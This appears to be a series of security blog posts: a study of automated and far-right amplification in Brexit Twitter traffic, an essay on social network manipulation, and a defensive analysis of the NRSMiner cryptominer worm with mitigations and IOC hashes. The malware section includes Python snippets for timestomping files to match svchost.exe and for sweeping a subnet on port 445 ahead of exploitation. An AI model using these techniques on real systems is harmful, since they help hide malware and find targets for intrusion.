Temporal Analysis

Temporal analysis methods can be useful for determining whether a Twitter account might be publishing tweets using automation. This section describes these techniques; their results are included later in this document. Here are some common temporal analysis methods:

  • Gather a histogram of counts of time intervals between the publishing of tweets. Numerous high counts of similar time intervals between tweets can indicate robotic behaviour.
  • A “heatmap” of the time of day, and day of the week that an account tweets can be gathered. The heatmap can then be examined (either by eye, or programmatically) for anomalous patterns. Using this technique, it is easy to identify accounts that tweet non-stop, with no breaks. If this is the case, it is possible that some (or all) of the tweets are being published via automation.
  • A heatmap analysis may also illustrate that certain accounts publish tweets en-masse at specific times of the day, and remain dormant for many hours in between. This behavior can also be an indicator that an account is automated – for instance, this is somewhat common with marketing automation or news feeds.
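Both the interarrival histogram and the heatmap reduce to simple counting over tweet timestamps. A minimal sketch, assuming timestamps arrive as UTC ISO-8601 strings:

```python
from collections import Counter
from datetime import datetime

def temporal_profile(timestamps):
    """Build a (weekday, hour) activity heatmap and a histogram of
    interarrival times (whole seconds between consecutive tweets)."""
    times = sorted(datetime.fromisoformat(ts) for ts in timestamps)
    heatmap = Counter((t.weekday(), t.hour) for t in times)
    deltas = Counter(int((later - earlier).total_seconds())
                     for earlier, later in zip(times, times[1:]))
    return heatmap, deltas
```

A tall spike in `deltas` at a small, constant interval, or a `heatmap` with no quiet hours at all, are exactly the patterns described in the bullet points above.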

Here are some interesting examples found from the dataset. Note that these examples are intended as illustration, and not as indications that the associated accounts are bots.

The stephanhawes2 account tweets in short bursts at specific times of the day, with no activity at any other time. The precise time windows during which this user tweets (18:00-20:59 and 00:00-01:59) look odd. This account retweets a great deal of far-right content.

Here are the time deltas (in seconds) observed between the account’s last 3200 tweets. You’ll notice that a majority of the tweets are published between 5 and 15 seconds apart.

The JimNola42035005 account, which amplifies a lot of pro-leave content, pauses tweeting between 08:00 UTC and 13:00 UTC. This is indicative of a user not residing in the UK’s time zone.

The interarrival pattern for this account shows a strong tendency for multiple tweets to be published in rapid succession (5-30 seconds apart).

The tobytortoise1 account tweets at very high volume, and almost always shows up at or near the top of the most active users tweeting about Brexit. This is a pro-leave account. Here’s the heatmap for that account. Note the bursts of activity exceeding 100 tweets in an hour:

Here is the interarrival pattern for that account:

The walshr108 account, which publishes pro-leave content, appears to pause roughly around UK night-time hours. However, the interarrival pattern of this account raises suspicion.

Over 350 of walshr108’s last 3200 tweets were published less than one second apart.

Unconventional source fields

Each published tweet includes a “source” field that is set by the agent that was used to publish that tweet. For instance, tweets published from the web interface have their source field set to “Twitter Web Client”. Tweets published from an iPhone have a source field set to “Twitter for iPhone”. And so on. Tweets can be published from a variety of sources, including services that allow tweets to be scheduled for publishing (for instance “IFTTT”), services that allow users to track follows and unfollows (such as “Unfollowspy”), apps within web pages, and social media aggregators. Twitter sources can be roughly grouped into:

  • Sources associated with manual tweeting (such as “Twitter Web Client”, “Twitter for iPhone”)
  • Sources associated with known automation services (such as “IFTTT”)
  • Sources that don’t match either of the above

While services that allow the automation of tweeting (such as “IFTTT”) can be used for malicious purposes, they can also be used for legitimate purposes (such as brand marketing, news feeds, and aggregators). Malicious actors sometimes shy away from such services for two reasons:

  • It is easy for researchers to identify tweet automation by examining source fields
  • Sophisticated tools exist that allow bot herders to publish tweets from multiple accounts without the use of the API, and which can spoof their user agent to match legitimate sources (often “Twitter for Android”)

Despite the availability of professional bot tools, there are still some malicious actors that use Twitter’s API and attempt to disguise what they’re doing. One way to do this is to create an app whose source field is a string similar to that of a known source (e.g. “Twitter for  Android” <- note that this string has two spaces between the words “for” and “Android”). Another way is to replace ASCII characters with non-ASCII characters (e.g. “Оwly” <- the “O” in this string is non-ASCII). API-based apps can also “hide” by using source strings that look like legitimate product names – there are a plethora of legitimate apps available that all have similar-looking names: Twuffer, Twibble, Twitterfy, Tweepsmap, Tweetsmap. It’s easy enough to create a similarly absurd, nonsensical word, and hide amongst all of these.
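The first two spoofing tricks – padded whitespace and non-ASCII look-alike characters – can at least be screened for mechanically. A heuristic sketch, assuming a hand-verified allowlist of legitimate source strings (note that non-ASCII alone is not proof of spoofing, and look-alike invented product names slip through entirely):

```python
def suspicious_source(source, allowlist):
    """Flag source strings that imitate a known client via extra
    whitespace or non-ASCII characters. Purely heuristic."""
    if source in allowlist:
        return False
    if not source.isascii():
        return True  # e.g. "Оwly" with a Cyrillic О
    collapsed = " ".join(source.split())
    # e.g. "Twitter for  Android" (two spaces) collapses to a known name
    return collapsed != source and collapsed in allowlist
```

This is a filter for one narrow class of disguise, not a bot detector; everything it flags still needs the manual review described below.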

Over 6,000 unique source strings were found in the dataset. There is no definitive list of “legitimate” Twitter sources available, and hence each and every one of the unique source strings found must be examined manually in order to build a list of acceptable versus unacceptable sources. This process involves either searching for the source string, locating a website, and reading it, or visiting the account that is using the unknown source string and manually checking the “legitimacy” of that account. At the time of writing, we had managed to hand-verify about 150 source strings that belonged to Twitter clients, known automation services, and custom apps used by legitimate services (such as news sites and aggregators). We found roughly 2 million tweets across the entire dataset that were published with source strings that we had yet to hand-verify. These tweets were published by just under 17,000 accounts.

As mentioned previously, since there are dozens of legitimate services that allow Twitter to be automated, it isn’t easy to programmatically identify whether these automation sources are being used for malicious purposes. Each use of such a service found in the dataset would need to be examined by hand (or by the use of custom filtering logic for each subset of examples). This is simply not feasible. As such, using Twitter’s source field to determine whether suspicious, malicious, or automated behaviour is occurring is a complex endeavour, and one that is outside of the scope of the research described in this document.

Comparison of remain and leave-centric communities

We collected retweet interactions over our entire dataset and created a large node-edge graph. The reason why we only captured retweet interactions in this case was based on the assumption that if users wish to extend the reach of a particular tweet, they’d more likely retweet it than reply to it, or simply mention an account name. While the process of “liking” a tweet also seems to amplify a tweet’s visibility (via Twitter’s underlying recommendation mechanisms), instances of users “liking” tweets are, unfortunately, not available via Twitter’s streaming API.

The graph of all retweet activity across the entire collection period contained 219,328 nodes (unique Twitter accounts) and 1,184,262 edges (each edge representing one or more observed retweets). Using python-igraph’s multilevel community detection algorithm, we partitioned the graph into communities. A total of 8,881 communities were discovered during this process. We performed string searches on the members of each identified community for high-profile accounts we’d seen engaging in leave and remain conversations throughout the research period, and were able to discover a leave-centric community containing 39,961 users and a remain-centric community containing 52,205 users. We then separately queried our full dataset with each list of users to isolate all relevant data (tweets, interactions, hashtags, and urls). Below are the findings from that analysis work.
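Our partitioning used python-igraph’s multilevel (Louvain) implementation. To illustrate the general idea without that dependency, here is a deterministic label-propagation sketch – a much simpler community detection scheme than the one we actually ran (real label propagation breaks ties randomly; here ties go to the largest label, and nodes are visited in sorted order, purely so the example is reproducible):

```python
from collections import Counter

def label_propagation(edges, max_iter=20):
    """Assign community labels by repeatedly giving each node the most
    common label among its neighbours (ties -> largest label)."""
    adj = {}
    for a, b in edges:
        adj.setdefault(a, set()).add(b)
        adj.setdefault(b, set()).add(a)
    labels = {node: node for node in adj}  # every node starts as its own community
    for _ in range(max_iter):
        changed = False
        for node in sorted(adj):
            counts = Counter(labels[nb] for nb in adj[node])
            top = max(counts.values())
            best = max(lab for lab, c in counts.items() if c == top)
            if labels[node] != best:
                labels[node] = best
                changed = True
        if not changed:
            break
    return labels
```

On a graph of two triangles bridged by a single edge, this converges to one label per triangle; on a 219,328-node retweet graph you would want the optimized igraph routines instead.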

Leave community

The leave-centric community comprised 39,961 users. They published 1.1 million unique tweets, and a total of 4.3 million retweets across the dataset.

  • 2,779 (6.95%) accounts that were seen at least 100 times in the dataset retweeted 95% (or more) of the time.
  • 278 (0.70%) accounts retweeted over 2000 times across the entire dataset, for a total of 880,620 retweets (20.5%). Of these, temporal analysis suggests that 33 of the accounts exhibited potentially suspicious behavior (11.9%) and 14 accounts tweeted during non-UK time schedules.
  • At the time of writing, 133 of these accounts (0.33%) had been suspended by Twitter.

Remain community

The remain-centric community comprised 52,205 users. They published 1.7 million unique tweets, and a total of 6.2 million retweets across the dataset.

  • 3,413 (6.54%) accounts that were seen at least 100 times in the dataset retweeted 95% (or more) of the time.
  • 436 (0.84%) accounts retweeted over 2000 times across the entire dataset, for a total of 1,471,515 retweets (23.7%). Of these, temporal analysis suggests that 41 of the accounts exhibited potentially suspicious behavior (9.4%) and 18 accounts tweeted during non-UK time schedules.
  • At the time of writing, 54 of these accounts (0.10%) had been suspended by Twitter.
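The retweet-ratio figures in the bullet points above come from straightforward per-account bookkeeping. A sketch, assuming per-account `(retweets, total_tweets)` counts have already been tallied from the dataset:

```python
def high_volume_retweeters(activity, min_seen=100, threshold=0.95):
    """Return accounts seen at least `min_seen` times whose share of
    retweets is at or above `threshold`, sorted by name."""
    return sorted(account
                  for account, (retweets, total) in activity.items()
                  if total >= min_seen and retweets / total >= threshold)
```

Adjusting `min_seen` and `threshold` gives the other bullet-point cuts (e.g. accounts with over 2,000 retweets).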


Although we were initially suspicious of high-volume retweeters, the presence of these in roughly equal proportions in both groups led us to believe that this sort of behaviour might be somewhat standard on Twitter. The top remain-centric group’s high-volume retweeters published more often than top leave-centric high-volume retweeters. We observed that many of the top retweeters from the remain-centric group tended to tweet a lot about Labour.

The top retweeted account in the leave-centric group received substantially more retweets than the next most highly retweeted account. This was not the case for the remain-centric group.

  • Top hashtags used by the remain-centric group included: #peoplesvote, #stopbrexit, #eu, #fbpe, #remain, #labour, #finalsay, and #revokea50. All of the top-50 hashtags in this group were themed around anti-brexit sentiment, around politicians, or around political events that happened in the UK during the data collection period (#specialplaceinhell, #theresamay, #corbyn, #donaldtusk, #newsnight).
  • Top hashtags used by the leave-centric group included: #eu, #nodeal, #standup4brexit, #ukip, #leavemeansleave, #projectfear and #leave. Notable other hashtags on the top-50 list for this group were other “no-deal” hashtags (#gowto, #wto, #letsgowto, #nodealnoproblem, #wtobrexit), hashtags referring to protests in France and the adoption of high-vis vests by far-right UK protesters (#giletsjaunes, #yellowvestsuk, #yellowvestuk) and the hashtag #trump.
  • Both groups heavily advertised links to UK Parliament online petitions relevant to the outcome of brexit. The remain group advertised links to petitions requesting a second referendum, whilst the leave group advertised links to petitions demanding the UK leave the EU, regardless of the outcome of negotiations.
  • From the users we identified as having retweeted more than 95% of the time, we found 62 accounts from the leave-centric group that were clearly American right-wing personas. These accounts associated with #Trump and #MAGA, amplified US political content, and interacted with US-based alt-right personalities (in addition to amplifying Brexit-related content). The description fields of these accounts usually included words such as “Patriot”, “Christian”, “NRA”, and “Israel”. Many of these accounts had their locations set to a state or city in the US. The most common locations set for these accounts were: Texas, Florida, California, New York, and North Carolina. We found no evidence of equivalent accounts in the remain-centric group.
  • Following on from our previous discovery, using a simple string search, we found 1,294 accounts in the leave-centric group and 12 accounts in the remain-centric group that had #MAGA in either their name or description fields. We manually visited a random selection of these accounts to verify that they were alt-right personas. A few of the #MAGA accounts identified in the remain group were not what we would consider alt-right – they showed up in the results due to the presence of negative comments about MAGA culture in their account description fields.
  • As detailed earlier, some of the accounts in the leave-centric group interacted with non-authoritative, far-right “news” accounts, or shared links to sites associated with these accounts (such as UnityNewsNet, BreakingNLive, LibertyDefenders, INewsNet, Voice of Europe, ZNEWSNET, PoliticalUK, and PoliticaLite.) We didn’t find any analogous activity in the remain-centric group.

We created a few plots of the number of times a hashtag was observed during each hour of the day. For a baseline reference, here’s what that plot looks like for the #brexit hashtag:

You can clearly see a lull in activity during night-time hours in the UK. Compare the above baseline with the plot for the #yellowvestuk hashtag:

This clearly shows that the #yellowvestuk hashtag is most frequently used in the late evening UK time (mid-afternoon US time). Here is the plot for #yellowvestsuk:

Note that this hashtag follows a different pattern to #yellowvestuk, and is used most often around lunchtime in the UK. Both of these graphs show a lull in activity during night-time hours in the UK, indicating that the accounts pushing these hashtags most likely belong to people living in the UK, and that possibly different groups are promoting these two competing hashtags.

Final thoughts

It is very difficult to determine whether a Twitter account is a bot, or acting as part of a coordinated astroturfing campaign, simply by performing queries with the standard API. Twitter’s programmatic interface imposes many limitations to what can be done when analyzing an account. For instance, by default, only the last 3200 tweets can be collected from any given account, and Twitter restricts how often such a query can be run. Most of the potentially suspicious accounts identified during this research have published tens, or even hundreds of thousands of tweets over their lifetimes, most of which are now inaccessible.

Since Twitter’s API doesn’t support observing when a user “likes” a tweet, and has limited support for querying which accounts retweeted a tweet, or replied to a tweet, it is impossible to track all actions that occur on the platform. Nowadays, a user’s Twitter timeline contains a series of recommendations (for instance, tweets that appear on a user’s timeline may indicate that they are there because “user x that you follow liked this tweet”). The timeline is no longer just a sequential list of tweets published by accounts a user follows. Hence it is important to understand which actions might increase the likelihood that a tweet appears on a user’s timeline, is recommended to a user (via notifications) or appears in a curated list when performing a search.

We do know that Twitter’s systems track an internal representation of the quality of every account, and give more engagement weight to higher quality accounts. Although it is likely that many of the potentially suspicious accounts identified during our research have low quality scores, it is still possible that their collective actions may incorrectly modify the sentiment of certain viewpoints and opinions, or cause content to be shown to users when it otherwise shouldn’t have.

From analysis of the “leave” and “remain” communities obtained by graph analysis, it seems clear to us that the remain-centric group looks quite organic, whilst the leave-centric group is being bolstered by non-UK far-right Twitter accounts. Leave users also utilize a number of “non-authoritative” news sources to spread their messages. Given that we also observed a subset of leave accounts performing amplification of political content related to French and US politics, we wouldn’t be surprised if coordinated astroturfing activity is being used to amplify pro-Brexit sentiment. Finding such a phenomenon would require additional work – most of the tweets published by this group likely weren’t captured by our stream-search for the word “brexit”. It’s clear that an internationally-coordinated collective of far-right activists is promoting content on Twitter (and likely other social networks) in order to steer discussions and amplify sentiment and opinion towards their own goals, Brexit being one of them.

During the course of our research, we created over 90 separate Jupyter notebooks and custom analysis tools. We would approximate that 90% of the approaches we tried ended up in dead ends. Despite all of this analysis work, we didn’t find the “next big” political disinformation botnet. We did, however, find many phenomena that were both interesting and odd.

Why Social Network Analysis Is Important

I got into social network analysis purely for nerdy reasons – I wanted to write some code in my free time, and python modules that wrap Twitter’s API (such as tweepy) allowed me to do simple things with just a few lines of code. I started off with toy tasks, (like mapping the time of day that @realDonaldTrump tweets) and then moved onto creating tools to fetch and process streaming data, which I used to visualize trends during some recent elections.

The more I work on these analyses, the more I’ve come to realize that there are layers upon layers of insights that can be derived from the data. There’s data hidden inside data – and there are many angles you can view it from, all of which highlight different phenomena. Social network data is like a living organism that changes from moment to moment.

Perhaps some pictures will help explain this better. Here’s a visualization of conversations about Brexit that happened between the 3rd and 4th of December, 2018. Each dot is a user, and each line represents a reply, mention, or retweet.

Tweets supportive of the idea that the UK should leave the EU are concentrated in the orange-colored community at the top. Tweets supportive of the UK remaining in the EU are in blue. The green nodes represent conversations about UK’s Labour party, and the purple nodes reflect conversations about Scotland. Names of accounts that were mentioned more often have a larger font.

Here’s what the conversation space looked like between the 14th and 15th of January, 2019.

Notice how the shape of the visualization has changed. Every snapshot produces a different picture, that reflects the opinions, issues, and participants in that particular conversation space, at the moment it was recorded. Here’s one more – this time from the 20th to 21st of January, 2019.

Every interaction space is unique. Here’s a visual representation of interactions between users and hashtags on Twitter during the weekend before the Finnish presidential elections that took place in January of 2018.

And here’s a representation of conversations that happened in the InfoSec community on Twitter between the 15th and 16th of March, 2018.

I’ve been looking at Twitter data on and off for a couple of years now. My focus has been on finding scams, social engineering, disinformation, sentiment amplification, and astroturfing campaigns. Even though the data is readily available via Twitter’s API, and plenty of the analysis can be automated, oftentimes finding suspicious activity just involves blind luck – the search space is so huge that you have to be looking in the right place, at the right time, to find it. One approach is, of course, to think like the adversary. Social networks run on recommendation algorithms that can be probed and reverse engineered. Once an adversary understands how those underlying algorithms work, they’ll game them to their advantage. These tactics share many analogies with search engine optimization methodologies. One approach to countering malicious activities on these platforms is to devise experiments that simulate the way attackers work, and then design appropriate detection methods, or countermeasures against these. Ultimately, it would be beneficial to have automation that can trace suspicious activity back through time, to its source, visualize how the interactions propagated through the network, and provide relevant insights (that can be queried using natural language). Of course, we’re not there yet.

The way social networks present information to users has changed over time. In the past, Twitter feeds contained a simple, sequential list of posts published by the accounts a user followed. Nowadays, Twitter feeds are made up of recommendations generated by the platform’s underlying models – what they understand about a user, and what they think the user wants to see.

A potentially dystopian outcome of social networks was outlined in a blog post written by François Chollet in May 2018, in which he describes social media becoming a “psychological panopticon”.

The premise for his theory is that the algorithms that drive social network recommendation systems have access to every user’s perceptions and actions. Algorithms designed to drive user engagement are currently rather simple, but if more complex algorithms (for instance, based on reinforcement learning) were to be used to drive these systems, they may end up creating optimization loops for human behavior, in which the recommender observes the current state of each target (user) and keeps tuning the information that is fed to them, until the algorithm starts observing the opinions and behaviors it wants to see. In essence the system will attempt to optimize its users. Here are some ways these algorithms may attempt to “train” their targets:

  • The algorithm may choose to only show its target content that it believes the target will engage or interact with, based on the algorithm’s notion of the target’s identity or personality. Thus, it will cause a reinforcement of certain opinions or views in the target, based on the algorithm’s own logic. (This is partially true today)
  • If the target publishes a post containing a viewpoint that the algorithm doesn’t wish the target to hold, it will only share it with users who would view the post negatively. The target will, after being flamed or down-voted enough times, stop sharing such views.
  • If the target publishes a post containing a viewpoint the algorithm wants the target to hold, it will only share it with users that would view the post positively. The target will, after some time, likely share more of the same views.
  • The algorithm may place a target in an “information bubble” where the target only sees posts from friends that share the target’s views (that are desirable to the algorithm).
  • The algorithm may notice that certain content it has shared with a target caused their opinions to shift towards a state (opinion) the algorithm deems more desirable. As such, the algorithm will continue to share similar content with the target, moving the target’s opinion further in that direction. Ultimately, the algorithm may itself be able to generate content to those ends.

Chollet goes on to mention that, although social network recommenders may start to see their users as optimization problems, a bigger threat still arises from external parties gaming those recommenders in malicious ways. The data available about users of a social network can already be used to predict when a user is suicidal or when a user will fall in love or break up with their partner, and content delivered by social networks can be used to change users’ moods. We also know that this same data can be used to predict which way a user will vote in an election, and the probability of whether that user will vote or not.

If this optimization problem seems like a thing of the future, bear in mind that, at the beginning of 2019, YouTube made changes to their recommendation algorithms exactly because of problems it was causing for certain members of society. Guillaume Chaslot posted a Twitter thread in February 2019 that described how YouTube’s algorithms favored recommending conspiracy theory videos, guided by the behaviors of a small group of hyper-engaged viewers. Fiction is often more engaging than fact, especially for users who spend all day, every day watching YouTube. As such, the conspiracy videos watched by this group of chronic users received high engagement, and thus were pushed up the recommendation system. Driven by these high engagement numbers, the makers of these videos created more and more content, which was, in turn, viewed by this same group of users. YouTube’s recommendation system was optimized to pull more and more users into a hole of chronic YouTube addiction. Many of the users sucked into this hole have since become indoctrinated with right-wing extremist views. One such user actually became convinced that his brother was a lizard, and killed him with a sword. Chaslot has since created a tool that allows users to see which of these types of videos are being promoted by YouTube.

Social engineering campaigns run by entities such as the Internet Research Agency, Cambridge Analytica, and the far-right demonstrate that social media advert distribution platforms (such as those on Facebook) have provided a weapon for malicious actors that is incredibly powerful, and damaging to society. The disruption caused by their recent political campaigns has created divides in popular thinking and opinion that may take generations to repair. Now that the effectiveness of these social engineering techniques is apparent, I expect what we’ve seen so far is just an omen of what’s to come.

The disinformation we hear about is only a fraction of what’s actually happening. It requires a great deal of time and effort for researchers to find evidence of these campaigns. As I already noted, Twitter data is open and freely available, and yet it can still be extremely tedious to find evidence of disinformation campaigns on that platform. Facebook’s targeted ads are only seen by the users who were targeted in the first place. Unless those who were targeted come forward, it is almost impossible to determine what sort of ads were published, who they were targeted at, and what the scale of the campaign was. Although social media platforms now enforce transparency on political ads, the source of these ads must still be determined in order to understand who’s being targeted, and by what content.

Many individuals on social networks share links to “clickbait” headlines that align with their personal views or opinions (sometimes without having read the content behind the link). Fact checking is uncommon, and often difficult for people who don’t have a lot of time on their hands. As such, inaccurate or fabricated news, headlines, or “facts” propagate through social networks so quickly that even if they are later refuted, the damage is already done. This mechanism forms the very basis of malicious social media disinformation. A well-documented example of this was the UK’s “Leave” campaign that was run before the Brexit referendum. Some details of that campaign are documented in the recent Channel 4 film: “Brexit: The Uncivil War”.

It’s not just the engineers of social networks that need to understand how they work and how they might be abused. Social networks are a relatively new form of human communication, and have only been around for a few decades. But they’re part of our everyday lives, and obviously they’re here to stay. Social networks are a powerful tool for spreading information and ideas, and an equally powerful weapon for social engineering, disinformation, and propaganda. As such, research into these systems should be of interest to governments, law enforcement, cyber security companies and organizations that seek to understand human communications, culture, and society.

The potential avenues of research in this field are numerous. Whilst my research with Twitter data has largely focused on graph analysis methodologies, I’ve also started experimenting with natural language processing techniques, which I feel have a great deal of potential.

The Orville, “Majority Rule”. A vote badge worn by all citizens of the alien world Sargus 4, allowing the wearer to receive positive or negative social currency. Source: youtube.com

We don’t yet know how much further social networks will integrate into society. Perhaps the future will end up looking like the “Majority Rule” episode of The Orville, or the “Nosedive” episode of Black Mirror, both of which depict societies in which each individual’s social “rating” determines what they can and can’t do and where a low enough rating can even lead to criminal punishment.

NRSMiner updates to newer version

More than a year after the world first saw the Eternal Blue exploit in action during the May 2017 WannaCry outbreak, we are still seeing unpatched machines in Asia being infected by malware that uses the exploit to spread. Starting in mid-November 2018, our telemetry reports indicate that the newest version of the NRSMiner cryptominer, which uses the Eternal Blue exploit to propagate to vulnerable systems within a local network, is actively spreading in Asia. Most of the infected systems seen are in Vietnam.


November-December 2018 telemetry statistics for NRSMiner, by country

In addition to downloading a cryptocurrency miner onto an infected machine, NRSMiner can download updated modules and delete the files and services installed by its own previous versions.

This post provides an analysis of how the latest version of NRSMiner infects a system and finds new vulnerable targets to infect. Recommendations for mitigation measures, IOCs and SHA1s are listed at the end of the post.


How NRSMiner spreads

There are two methods by which a system can be infected by the newest version of NRSMiner:

  • By downloading the updater module onto a system that is already infected with a previous version of NRSMiner, or:
  • If the system is unpatched (MS17-010) and another system within the intranet has been infected by NRSMiner.


Method 1: Infection via the Updater module

First, a system that has been infected with an older version of NRSMiner (and has the wmassrv service running) will connect to tecate[.]traduires[.]com to download an updater module to the %systemroot%\temp folder as tmp[xx].exe, where [xx] is the return value of the GetTickCount() API.

When this updater module is executed, it downloads another file to the same folder from one of a series of hard-coded IP addresses:


List of IP addresses found in different updater module files

The downloaded file, /x86 or /x64, is saved in the %systemroot%\temp folder as WUDHostUpgrade[xx].exe; again, [xx] is the return value of the GetTickCount() API.


The WUDHostUpgrade[xx].exe first checks the mutex {502CBAF5-55E5-F190-16321A4} to determine whether the system has already been infected with the latest NRSMiner version. If the system is already infected, WUDHostUpgrade[xx].exe deletes itself. Otherwise, it deletes the files MarsTraceDiagnostics.xml, snmpstorsrv.dll and MgmtFilterShim.ini.

Next, the module extracts the following files from its resource section (BIN directory) to the %systemroot%\system32 or %systemroot%\sysWOW64 folder: MarsTraceDiagnostics.xml, snmpstorsrv.dll.

It then copies the values for the CreationTime, LastAccessTime and LastWritetime properties from svchost.exe and updates the same properties for the MarsTraceDiagnostics.xml and snmpstorsrv.dll files with the copied values.
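This timestamp cloning (“timestomping”) helps the dropped files blend in with legitimate Windows binaries. The malware uses Windows file-time APIs for all three timestamps; below is a minimal cross-platform sketch of the same idea, covering access and modification times only (the paths in the comment are illustrative):

```python
import os

def clone_timestamps(reference: str, target: str) -> None:
    """Copy access and modification times from reference to target, so the
    target appears as old as the reference (NRSMiner does this using
    svchost.exe's timestamps; CreationTime needs Windows-specific APIs)."""
    st = os.stat(reference)
    os.utime(target, (st.st_atime, st.st_mtime))

# e.g. clone_timestamps(r"C:\Windows\System32\svchost.exe",
#                       r"C:\Windows\System32\snmpstorsrv.dll")
```

A forensic timeline built only on modification times will therefore not flag the dropped files as recent additions.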

Finally, the WUDHostUpgrade[xx].exe installs a service named snmpstorsrv, with snmpstorsrv.dll registered as servicedll. It then deletes itself.



Pseudo-code for WUDHostUpgradexx.exe’s actions


Snmpstorsrv service

The newly-created Snmpstorsrv service starts under “svchost.exe -k netsvcs” and loads the snmpstorsrv.dll file, which creates multiple threads to perform several malicious activities.


Snmpstorsrv service’s activities

The service first creates a file named MgmtFilterShim.ini in the %systemroot%\system32 folder, writes ‘+’ in it and modifies its CreationTime, LastAccessTime and LastWritetime properties to have the same values as svchost.exe.

Next, the Snmpstorsrv service extracts malicious URLs and the cryptocurrency miner’s configuration file from MarsTraceDiagnostics.xml.


Malicious URLs and miner configuration details in the MarsTraceDiagnostics.xml file

On a system that is already infected with an older version of NRSMiner, the malware deletes all components of that older version before installing the newer one. To remove the immediately prior version of itself, the newest version refers to a list of services, tasks and files to be deleted, found as strings in the snmpstorsrv.dll file; to remove all older versions, it refers to a list found in the MarsTraceDiagnostics.xml file.


List of services, tasks, files and folders to be deleted

After all the artifacts of the old versions are deleted, the Snmpstorsrv service checks for any updates to the miner module by connecting to:

  • reader[.]pamphler[.]com/resource
  • handle[.]pamphler[.]com/modules.dat

If an updated miner module is available, it is downloaded and written into the MarsTraceDiagnostics.xml file. Once the new module is downloaded, the old miner file in %systemroot%\system32\TrustedHostex.exe is deleted. The new miner is decompressed in memory and the newly extracted miner configuration data is written into it.

This newly updated miner file is then injected into the svchost.exe to start crypto-mining. If the injection fails, the service instead writes the miner to %systemroot%\system32\TrustedHostex.exe and executes it.


The miner decompressed in memory

Next, the Snmpstorsrv service decompresses the wininit.exe file and injects it into svchost.exe. If the injection fails, it writes wininit.exe to %systemroot%\AppDiagnostics\wininit.exe and executes it. The service also opens port 60153 and starts listening.

In two other threads, the service sends out details about the infected system to the following sites:

  • pluck[.]moisture[.]tk – MAC address, IP Address, System Name, Operating System information
  • jump[.]taucepan[.]com – processor and memory specific information


System information forwarded to remote sites

Based on the information sent, a new updater file will be downloaded and executed, which will perform the same activities as described in “Updater Module” section above. This updater module can be used to infect systems with any new upcoming version of NRSMiner.


Method 2: Infection via Wininit.exe and Exploit

In the latest NRSMiner version, wininit.exe is responsible for handling its exploitation and propagation activities. Wininit.exe decompresses the zipped data in %systemroot%\AppDiagnostics\blue.xml and unzips files to the AppDiagnostics folder. Among the unzipped files is one named svchost.exe, which is the Eternalblue – 2.2.0 exploit executable. It then deletes the blue.xml file and writes 2 new files named x86.dll and x64.dll in the AppDiagnostics folder.

Wininit.exe scans the local network on TCP port 445 to search for other accessible systems. After the scan, it executes the Eternalblue executable file to exploit any vulnerable systems found. Exploit information is logged in the process1.txt file.
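The scan-then-exploit sequence can be sketched in a few lines. The following is a hypothetical Python approximation of the sweep (the actual malware is native code, and the function names here are our own):

```python
import ipaddress
import socket

def targets(cidr: str) -> list[str]:
    """All host addresses in a subnet (network/broadcast excluded)."""
    return [str(h) for h in ipaddress.ip_network(cidr).hosts()]

def port_open(host: str, port: int = 445, timeout: float = 0.3) -> bool:
    """True if a TCP connection to host:port succeeds within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# Sweep the local /24 the way the worm does before launching the exploit:
# candidates = [h for h in targets("192.168.1.0/24") if port_open(h)]
```

Any host answering on TCP 445 becomes a candidate for the Eternalblue exploit step described above.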

If the vulnerable system is successfully exploited, Wininit.exe then executes spoolsv.exe, which is the DoublePulsar – 1.3.1 executable file. This file installs the DoublePulsar backdoor onto the exploited system. Depending on the operating system of the target, either the x86.dll or x64.dll file is then transferred by Wininit.exe and gets injected into the targeted system’s lsass.exe by the spoolsv.exe backdoor.


Propagation method


The injected DLL creates a socket connection and retrieves the MarsTraceDiagnostics.xml file in the %systemroot%\system32 folder from the parent infected system. It extracts snmpstorsrv.dll, then creates and starts the Snmpstorsrv service on the newly infected system, which repeats the whole infection cycle and searches for other vulnerable machines.

Miner module

NRSMiner uses the XMRig Monero CPU miner to generate units of the Monero cryptocurrency. It runs with one of the following parameters:


Miner parameters

The following are the switches used in the parameters:

  • -o, --url=URL          URL of mining server
  • -u, --user=USERNAME    username for mining server
  • -p, --pass=PASSWORD    password for mining server
  • -t, --threads=N        number of miner threads
  • --donate-level=N       donate level, default 5% (5 minutes in 100 minutes)
  • --nicehash             enable nicehash.com support



F-Secure products currently detect and block all variants of this malware, with a variety of detections.

Mitigation recommendations

The following measures can be taken to mitigate the exploitation of the vulnerability targeted by Eternal Blue and prevent an infection from spreading in your environment.

  • For F-Secure products:
    • Ensure that the F-Secure security program is using the latest available database updates.
    • Ensure DeepGuard is turned on in all your corporate endpoints, and F-Secure Security Cloud connection is enabled.
    • Ensure that the F-Secure firewall is turned on with its default settings. Alternatively, configure your firewall to properly block inbound and outbound traffic on port 445 within the organization to prevent the malware from spreading within the local network.
  • For Windows:
    • Use Software Updater or any other available tool to identify endpoints without the Microsoft-issued security fix (4013389) and patch them immediately.
    • Apply the relevant security patches for any Windows systems under your administration based on the guidance given in Microsoft’s Customer Guidance for WannaCrypt attacks.
    • If you are unable to patch immediately, we recommend that you disable SMBv1 using the steps documented in Microsoft Knowledge Base Article 2696547 to reduce the attack surface.


Indicators of compromise (IOC):


32ffc268b7db4e43d661c8b8e14005b3d9abd306 - MarsTraceDiagnostics.xml
07fab65174a54df87c4bc6090594d17be6609a5e - snmpstorsrv.dll
abd64831ad85345962d1e0525de75a12c91c9e55 - AppDiagnostics folder (zip)
4971e6eb72c3738e19c6491a473b6c420dde2b57 - Wininit.exe
e43c51aea1fefb3a05e63ba6e452ef0249e71dd9 - tmpxx.exe
327d908430f27515df96c3dcd180bda14ff47fda - tmpxx.exe
37e51ac73b2205785c24045bc46b69f776586421 - WUDHostUpgradexx.exe
da673eda0757650fdd6ab35dbf9789ba8128f460 - WUDHostUpgradexx.exe
ace69a35fea67d32348fc07e491080fa635cc859 - WUDHostUpgradexx.exe
890377356f1d41d2816372e094b4e4687659a96f - WUDHostUpgradexx.exe
7f1f63feaf79c5f0a4caa5bbc1b9d76b8641181a - WUDHostUpgradexx.exe
9d4d574a01aaab5688b3b9eb4f3df2bd98e9790c - WUDHostUpgradexx.exe
9d7d20e834b2651036fb44774c5f645363d4e051 - x64.dll
641603020238a059739ab4cd50199b76b70304e1 - x86.dll

IP addresses:




Phishing Campaign targeting French Industry

